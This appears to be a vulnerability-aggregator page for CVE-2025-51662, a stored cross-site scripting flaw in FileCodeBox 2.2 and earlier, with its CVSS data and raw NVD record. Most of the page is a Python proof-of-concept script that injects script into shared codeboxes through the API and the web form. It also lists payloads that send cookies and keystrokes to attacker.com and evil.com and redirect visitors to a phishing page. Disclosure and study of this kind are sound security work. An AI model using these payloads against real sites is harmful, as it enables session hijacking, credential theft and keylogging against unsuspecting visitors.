CVE-2025-51662

Description

A stored cross-site scripting (XSS) vulnerability is found in the text sharing feature of FileCodeBox version 2.2 and earlier. Insufficient input validation allows attackers to inject arbitrary JavaScript code into shared text "codeboxes". The xss payload is automatically executed in the browsers of any users who try to access the infected codebox by clicking link or entering share code.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lanol:filecodebox:*:*:*:*:*:*:*:* - VULNERABLE

FileCodeBox <= 2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-51662 Stored XSS PoC for FileCodeBox
# This PoC demonstrates the XSS vulnerability in FileCodeBox text sharing feature

import requests
import json

TARGET_URL = "http://target-filecodebox.com"

# XSS payload - can be customized for different attack scenarios
xss_payload = '<script>alert(document.cookie)</script>'

# Method 1: Exploit via API endpoint
def exploit_via_api():
    """Send malicious payload through FileCodeBox API"""
    api_url = f"{TARGET_URL}/api/share"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Malicious payload disguised as normal text
    data = {
        "content": f"Normal text content {xss_payload} more text",
        "expiry": "1h",
        "password": ""
    }
    
    try:
        response = requests.post(api_url, json=data, headers=headers, timeout=10)
        if response.status_code == 200:
            result = response.json()
            share_code = result.get("code", "")
            print(f"[+] XSS payload injected successfully!")
            print(f"[+] Share code: {share_code}")
            print(f"[+] Access URL: {TARGET_URL}/box/{share_code}")
            print(f"[!] Any user accessing this link will trigger the XSS")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Method 2: Exploit via web interface (requires session)
def exploit_via_web(session):
    """Send malicious payload through web interface"""
    submit_url = f"{TARGET_URL}/submit"
    
    data = {
        "content": xss_payload,
        "expiry": "24h"
    }
    
    try:
        response = session.post(submit_url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Web interface exploitation successful")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Advanced payload examples
advanced_payloads = {
    "cookie_stealer": '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>',
    "session_hijack": '<img src=x onerror="fetch(\'https://evil.com/log?data=\'+btoa(document.cookie))">',
    "phishing_redirect": '<script>window.location="https://fake-bank.com/phish"</script>',
    "keylogger": '<script>document.onkeypress=function(e){fetch("https://attacker.com/klog?k="+e.key)}</script>'
}

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-51662 FileCodeBox Stored XSS Exploitation")
    print("=" * 60)
    exploit_via_api()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-51662
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-51662
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-51662/
[4] VulDB https://vuldb.com/cve/CVE-2025-51662
[5] https://github.com/vastsa/FileCodeBox
[6] https://github.com/vastsa/FileCodeBox/issues/351
[7] https://github.com/vastsa/FileCodeBox/issues/351

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-51662", "sourceIdentifier": "[email protected]", "published": "2025-11-19T20:15:53.017", "lastModified": "2025-11-24T19:40:24.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability is found in the text sharing feature of FileCodeBox version 2.2 and earlier. Insufficient input validation allows attackers to inject arbitrary JavaScript code into shared text \"codeboxes\". The xss payload is automatically executed in the browsers of any users who try to access the infected codebox by clicking link or entering share code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lanol:filecodebox:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.2", "matchCriteriaId": "F79F1C73-2F99-49E2-8B8F-64900B8E51FB"}]}]}], "references": [{"url": "https://github.com/vastsa/FileCodeBox", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vastsa/FileCodeBox/issues/351", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/vastsa/FileCodeBox/issues/351", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}